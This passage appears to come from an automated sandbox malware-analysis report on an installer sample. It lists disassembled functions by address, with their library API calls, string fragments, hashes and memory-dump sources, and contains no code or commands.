                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr
                                      • String ID: 8Q
                                      • API String ID: 1659562826-4022487301
                                      • Opcode ID: 23478db8cb693bab3828ec6befc663a23532fdcdcfcf0d0c8d2a1398ac92e133
                                      • Instruction ID: 56936176e8616c7095fecf2d63fabd8c7e03a0280f3c9daaa27cff041feb2953
                                      • Opcode Fuzzy Hash: 23478db8cb693bab3828ec6befc663a23532fdcdcfcf0d0c8d2a1398ac92e133
                                      • Instruction Fuzzy Hash: 1141A9716071C4AFDB11CF29D890BA97FF5EF87394F244259E8808B645D3318C118BA0
                                      Function 6CBD812C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: X&L$p|J
                                      • API String ID: 3519838083-2944591232
                                      • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                      • Instruction ID: 49122cf1e952097b3d01f933e795a2f6623db5eb9d3404f1cf9e9e4a60d5655e
                                      • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                      • Instruction Fuzzy Hash: F8314C31AC59C5CBD7019B5CDD01BAD7771EB0672AF221137D401A2EA2CB63B989CBD2
                                      Function 6CBD7C24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 0|J$`)L
                                      • API String ID: 3519838083-117937767
                                      • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                      • Instruction ID: 70791d2c67bcce392742b94ba40abaeb9b0739f2238d9bf2a37a9a42d5411562
                                      • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                      • Instruction Fuzzy Hash: B941A0716057C5EFCB119F60C8907EEBBE2FF46208F15442EE05AA7710CB716908CB92
                                      Function 6CBDACB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: __aulldiv
                                      • String ID: 3333
                                      • API String ID: 3732870572-2924271548
                                      • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                      • Instruction ID: ef8a1c3da0c9f79d3594b024a281b4a6da0e20a49dc5ae9908308cc44b6ed100
                                      • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                      • Instruction Fuzzy Hash: 6A21A7B09407546FD730CFBA8880B5BFAFDEB84715F10891EA18AD7B40D771A9048B65
                                      Function 6CBCE77E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: #$4qJ
                                      • API String ID: 3519838083-3965466581
                                      • Opcode ID: 84a8eb9074b6f9089a1fd02d6bcb4d7259a4313f9f2765f71615d484bdca8079
                                      • Instruction ID: bdcf680fc4cf930ab3346ff8a533d149343ce63c62c14a55acabdbde4fae6a21
                                      • Opcode Fuzzy Hash: 84a8eb9074b6f9089a1fd02d6bcb4d7259a4313f9f2765f71615d484bdca8079
                                      • Instruction Fuzzy Hash: AF31BA35A052D8DFEF10CF55C881AAE73B4EF49319F044169E811ABA50D730AD05CBA2
                                      Function 6CB6BC97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6CB6C2BD
                                      • ___raise_securityfailure.LIBCMT ref: 6CB6C3A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                      • String ID: Lh>
                                      • API String ID: 3761405300-2363018161
                                      • Opcode ID: 5a05a44e5d951ee5dbc3537617fa239d7274e70866fd7c2fdfc25c1e5a9aea1b
                                      • Instruction ID: 10a7f4cb705d98e2c8f01d541ae329991b0f1c8bd926843061c2cb06bf64104f
                                      • Opcode Fuzzy Hash: 5a05a44e5d951ee5dbc3537617fa239d7274e70866fd7c2fdfc25c1e5a9aea1b
                                      • Instruction Fuzzy Hash: AB2132B87102009BDF00DF2BD755A603BF4FB8A314F1099AAE904CB790E3B49980EF84
                                      Function 6CBD3906 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: @$LuJ
                                      • API String ID: 3519838083-205571748
                                      • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                      • Instruction ID: 5f44a6e24163bf41e2cc060a742ab996899821ef11fcc6b0f3dee895204b3756
                                      • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                      • Instruction Fuzzy Hash: ED018072E05349DACB10DFE9C8805AEF7B4FF59704F40842EE56AE3A41C338A945CB99
                                      Function 6CB81418 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 6CB81439
                                      • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6CB7DD2A,?,00000004,?,4B42FCB6,?,?,6CB72E7C,4B42FCB6,?), ref: 6CB81475
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: AllocHeap_free
                                      • String ID: 8Q
                                      • API String ID: 1080816511-4022487301
                                      • Opcode ID: d33bce37e7d7ecd23e327e81081e9c21bdea6db862985e19ab980ca2d68bc8bf
                                      • Instruction ID: 068e85f9f691037c101c6806cd2fd3b8a3db2a86aca318dcbbe8ed0ec645d0bb
                                      • Opcode Fuzzy Hash: d33bce37e7d7ecd23e327e81081e9c21bdea6db862985e19ab980ca2d68bc8bf
                                      • Instruction Fuzzy Hash: 8BF06831607191A69B211A669C04BDF377DDFC3AB9F1D8125E836A7A80DB60D4058AA3
                                      Function 6CBE0180 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBE0185
                                        • Part of subcall function 6CBE022B: __EH_prolog.LIBCMT ref: 6CBE0230
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: J$0J
                                      • API String ID: 3519838083-2882003284
                                      • Opcode ID: 5025c659522292fd6d13656942a962c3f91794ff08eea141c4429de393d252e1
                                      • Instruction ID: 65bb1bcc752ada5acd246d4ce4c928f0147aceaf014651141c28b470e9c5fa3d
                                      • Opcode Fuzzy Hash: 5025c659522292fd6d13656942a962c3f91794ff08eea141c4429de393d252e1
                                      • Instruction Fuzzy Hash: 3511A5B0811B108BC3248F16D4541DAFBF8FFA5754F40C91FC4AA87720C7B8A5488F98
                                      Function 6CBDDFC7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBDDFCC
                                        • Part of subcall function 6CBDD4D1: __EH_prolog.LIBCMT ref: 6CBDD4D6
                                        • Part of subcall function 6CBDC14B: __EH_prolog.LIBCMT ref: 6CBDC150
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: J$0J
                                      • API String ID: 3519838083-2882003284
                                      • Opcode ID: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                      • Instruction ID: ed0da59a6d43b7905fa7203eafdc9c0b2566cdce7100cb11b8db756964286e2f
                                      • Opcode Fuzzy Hash: e6d3612d4e81af9a8d93b7ad1b32697a4da849f1579351cb7c1b36bc92f9105d
                                      • Instruction Fuzzy Hash: BF01C5B1804B51CFD325CF66C5A468AFBE4BB15704F90C95EC0AA57B50D7B8B508CF68
                                      Function 6CBFE434 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBFE439
                                        • Part of subcall function 6CBFE4BA: __EH_prolog.LIBCMT ref: 6CBFE4BF
                                        • Part of subcall function 6CBE022B: __EH_prolog.LIBCMT ref: 6CBE0230
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: D.K$T.K
                                      • API String ID: 3519838083-2437000251
                                      • Opcode ID: 4bf8c15ffd7a86929b4665866baf81e9eeb815ebced635067bbf52e837154634
                                      • Instruction ID: 486fdfc37352684db1cd3ad078ada6a90daad73212fcd176fe3aa453bd45ff7f
                                      • Opcode Fuzzy Hash: 4bf8c15ffd7a86929b4665866baf81e9eeb815ebced635067bbf52e837154634
                                      • Instruction Fuzzy Hash: A3012C70911791CFC724CF69C5142DEBBF4AF19704F00C91E80AA97B40EBB8AA08CBA5
                                      Function 6CBD0425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 8)L$8rJ
                                      • API String ID: 3519838083-896068166
                                      • Opcode ID: 31b7b83379da487e0b0fee470bf6f7791c36dd68afdddb73284a070326b97c38
                                      • Instruction ID: 8cad3eda4e6aecbc5435ca2e24618bcce1eacdcf1ac688ea23ab93df431fae8e
                                      • Opcode Fuzzy Hash: 31b7b83379da487e0b0fee470bf6f7791c36dd68afdddb73284a070326b97c38
                                      • Instruction Fuzzy Hash: 27F03A76A04114EFC700CF98D949EDEBBF8FF4A355F14806AF405A7211D7B89A04CBA5
                                      Function 6CBDA4CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prologctype
                                      • String ID: \~J
                                      • API String ID: 3037903784-3176329776
                                      • Opcode ID: 46757733936a42b96b936dd1dab949ec9d96d52f22713a54e894f9e80fe70f1d
                                      • Instruction ID: 5a988b0630f724efe6f34db1240b1dd8a8184a330b5c2ef883c2d8951ec56b98
                                      • Opcode Fuzzy Hash: 46757733936a42b96b936dd1dab949ec9d96d52f22713a54e894f9e80fe70f1d
                                      • Instruction Fuzzy Hash: 50E09232A06561DBDB249F49D814BEEF3B8EF44B29F12815FD015A7A51CBB1FA00CE81
                                      Function 6CBD6431 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prologctype
                                      • String ID: |zJ
                                      • API String ID: 3037903784-3782439380
                                      • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                      • Instruction ID: 288668679c01e8575cb93682893c13b50774cc89404df65c617ff186c47121f2
                                      • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                      • Instruction Fuzzy Hash: A3E065326065619BE7149B49D8117DDF3A4FF54719F11441F9016E7A45CBB1B8448B82
                                      Function 6CBDC0DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBDC0E0
                                        • Part of subcall function 6CBDC14B: __EH_prolog.LIBCMT ref: 6CBDC150
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: J$0J
                                      • API String ID: 3519838083-2882003284
                                      • Opcode ID: 235f570c22735095cf226f139ec23b8166c83fec4b7bd0089cfa702e7a6a385e
                                      • Instruction ID: e4d55601e2490cf863a92dfaac7be04225c0128784994f6a365f3e93dc2c16ef
                                      • Opcode Fuzzy Hash: 235f570c22735095cf226f139ec23b8166c83fec4b7bd0089cfa702e7a6a385e
                                      • Instruction Fuzzy Hash: 93F0C4B0901B61CFC724DF59D81428ABBF0FB15704B50C91F80AA97B10D7B8A548CBA8
                                      Function 6CC024AB Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @ K$DJ$T)K$X/K
                                      • API String ID: 0-3815299647
                                      • Opcode ID: dac98d89fb1dd2bd8a0dcac61504098bca9fe61148d739192528eb0bc1c541c2
                                      • Instruction ID: bf7c903d306fc76010f11d0b8af962a7ed0c734a2831bdb0de37bd969c583036
                                      • Opcode Fuzzy Hash: dac98d89fb1dd2bd8a0dcac61504098bca9fe61148d739192528eb0bc1c541c2
                                      • Instruction Fuzzy Hash: 7F91C2347083859BCB04DF69C4747EE73B6AF4630DF104429C8665BB82EB77A949CB51
                                      Function 6CBF7E19 Relevance: 5.2, Strings: 4, Instructions: 161COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: D)K$H)K$P)K$T)K
                                      • API String ID: 0-2262112463
                                      • Opcode ID: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                      • Instruction ID: 0a64534e48f15274dbf4e42a114193561a29914093f481bdc802ce790aba7556
                                      • Opcode Fuzzy Hash: db2bed83cd242086b620a75a277d992f39b5cdae26f25bede05caa2e01ee838f
                                      • Instruction Fuzzy Hash: F051D6309042CA9BDF00DFA5D840AEEB775EF1631CF10446AE82177B80DBB5994EC792
                                      Function 6CC17F20 Relevance: 5.0, Strings: 4, Instructions: 27COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (?K$8?K$H?K$CK
                                      • API String ID: 0-3450752836
                                      • Opcode ID: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                      • Instruction ID: 97f67599c4f4f8366343fdf3504ad9520faa9f07e9cc494af368258da2d8ae35
                                      • Opcode Fuzzy Hash: d4c246a701e4ab7ba432eee481bca3e782bec61bf51628d32b3eb083001bfa55
                                      • Instruction Fuzzy Hash: 57F03AB06017009FC320CF06D54869BFBF4EB4570AF50C91EE19A9BA40E3BCA5088FA8
                                      Function 6CC00AAC Relevance: 5.0, Strings: 4, Instructions: 23COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 00K$@0K$P0K$`0K
                                      • API String ID: 0-1070766156
                                      • Opcode ID: 7efb1c77604c1d1a2dcd35be8e9d5171401199da8c632a149feb581716eb9edd
                                      • Instruction ID: cc08c49e7cab151d94aeeb036fe5aa8110f11b29cf5188a6292b857041db77c5
                                      • Opcode Fuzzy Hash: 7efb1c77604c1d1a2dcd35be8e9d5171401199da8c632a149feb581716eb9edd
                                      • Instruction Fuzzy Hash: 2DF03FB14152408FD348DF1A9598A82BFE0AF95319B56C1DED0184F276C3B9CA48CFA8